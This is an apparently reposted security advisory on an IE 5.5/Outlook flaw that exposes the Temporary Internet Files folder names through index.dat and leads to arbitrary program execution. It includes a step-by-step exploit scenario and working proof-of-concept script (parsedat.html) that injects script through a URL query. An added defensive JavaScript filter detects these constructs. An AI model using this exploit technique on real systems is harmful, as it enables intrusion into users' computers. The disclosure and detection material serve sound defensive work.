There is a security vulnerability in IE 5.5 and Outlook that enables malicious attackers to execute arbitrary programs by sending an e-mail containing the tag OBJECT TYPE="text/html". The same hole also enables remote users to parse the index.dat file, thereby revealing the location of the Temporary Internet Files folder. This may lead to full control over the user's computer.
Note: This is a completely different issue from the advisory "IE 5.x/Outlook allows executing arbitrary programs using .chm files and temporary internet files folder", though both share some common properties.
Credit:
The information has been provided by Georgi Guninski.
Vulnerable systems:
IE 5.5 (probably other 5.x versions as well) and Outlook/Outlook Express
Background:
If one can inject a file onto the user's local disk and knows its exact location, it is possible to execute arbitrary programs in at least two ways:
1) Using the window.showHelp() function (example: window.showHelp("c:\\dir\\hostile.chm"))
2) Using an <OBJECT> tag (for example: <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE">)
Therefore, the only question that arises is how to inject a chosen file onto the user's disk. One good way is to use the Temporary Internet Files folder, which contains cached documents and files. The only problem with this is that it has several subfolders with random names. There is, however, a special file called "index.dat", which acts as a catalog or registry: it contains all visited URLs as well as more useful information, namely the names of the random folders (they appear at the beginning of the file).
A possible exploit scenario:
1) Inject JavaScript into index.dat by: window.open("http://example.com/index.html?<SCRIPT>JSCODE</SCRIPT>"). The JavaScript is executed in index.dat and has access to its content, which allows us to find the random directory names.
2) Parse / render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
3) Once the Temporary Internet Files folders are known, inject for example .chm files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
The presence of the random Temporary Internet Files folder names in index.dat is very dangerous: it means that every Cross Frame Security vulnerability, or any vulnerability that reads local files, may lead to executing arbitrary programs.
Exploit:
--------parsedat.html------------------------------------------------
This demo is for Windows 9x - you must modify the source for Win2K. You may need to wait a few minutes if you have a slow computer; with a Pentium 500 or better, or on Win2K, probably much less. A window with location "about:blank" is expected to open containing index.dat - the file where the random names of the Temporary Internet Files directories are kept (the random names appear at the beginning of the window) along with the list of all visited URLs, among other things. Once the Temporary Internet Files directories are known it is possible to execute arbitrary programs through cached files and showHelp() or OBJECT CODEBASE="...". If you don't see a window with location "about:blank" and the content of index.dat, close IE and visit the page again.
<SCRIPT>
// Open a window whose URL carries script into index.dat; that script copies the
// page body into a new about:blank window (step 1 of the scenario).
b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
// Win9x location of index.dat, rendered as HTML (step 2 of the scenario).
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
//s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
// ^^^ This is for Win2K - you must change "Administrator" to the actual user name
setTimeout("document.writeln(s)",5000);
</SCRIPT>
---------------------------------------------------------------------
Workaround:
Disable Active Scripting and move the Temporary Internet Files folder to an unpredictable location.
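A defender-side check, added here and not part of the advisory: a content filter function that flags the constructs described in the background and scenario above (a local file:// or drive-letter path in OBJECT DATA or CODEBASE, showHelp() with a local path, and a SCRIPT tag smuggled into a URL query string). The function names and the sample HTML body are constructed for illustration.

```javascript
// Added example, not from Guninski's advisory: flag the indicators the scenario
// describes in an HTML/e-mail body. Attribute parsing is simplified (no '>' in quotes).
const OBJECT_TAG = /<OBJECT\b([^>]*)>/gi;
const ATTR = /(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
// file: URLs, drive-letter paths and UNC paths all refer to the local machine
const LOCAL_PATH = /^(?:file:\/\/|[a-z]:[\\/]|\\\\)/i;

function parseAttributes(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR)) {
    attrs[m[1].toUpperCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Returns one finding per suspicious construct; an empty array means nothing was flagged.
function findLocalObjectReferences(html) {
  const findings = [];
  for (const m of html.matchAll(OBJECT_TAG)) {
    const a = parseAttributes(m[1]);
    // scenario step 2: a local file rendered through <OBJECT DATA=... TYPE="text/html">
    if (a.DATA && LOCAL_PATH.test(a.DATA)) {
      findings.push({ kind: 'object-data-local', value: a.DATA, renderedAs: a.TYPE || '' });
    }
    // background way 2: CODEBASE pointing at a local executable
    if (a.CODEBASE && LOCAL_PATH.test(a.CODEBASE)) {
      findings.push({ kind: 'object-codebase-local', value: a.CODEBASE });
    }
  }
  // background way 1: window.showHelp() called with a local path
  for (const m of html.matchAll(/showHelp\s*\(\s*(["'])(.*?)\1/gi)) {
    if (LOCAL_PATH.test(m[2])) findings.push({ kind: 'showhelp-local', value: m[2] });
  }
  // scenario step 1: a <SCRIPT> tag inside a URL query string, used to seed index.dat
  for (const m of html.matchAll(/https?:\/\/[^\s"')]*\?[^\s"')]*<SCRIPT/gi)) {
    findings.push({ kind: 'script-in-query', value: m[0] });
  }
  return findings;
}

// Constructed sample body: the advisory's constructs plus one benign remote OBJECT.
const SAMPLE = String.raw`<html><body>
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
<OBJECT CODEBASE="C:\DIR\HOSTILE.EXE"></OBJECT>
<OBJECT DATA="https://example.org/widget.swf" TYPE="application/x-shockwave-flash"></OBJECT>
<SCRIPT>window.showHelp("c:\\dir\\hostile.chm");
window.open("http://example.com/index.html?<SCRIPT>JSCODE</SCRIPT>");</SCRIPT>
</body></html>`;
console.log(findLocalObjectReferences(SAMPLE));
```

Running the block prints four findings for the sample and none for the benign OBJECT alone.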
Demonstration:
The following demonstration opens index.dat that contains the Temporary Internet Files Folders and the list of all visited URLs:
http://www.guninski.com/parsedat.html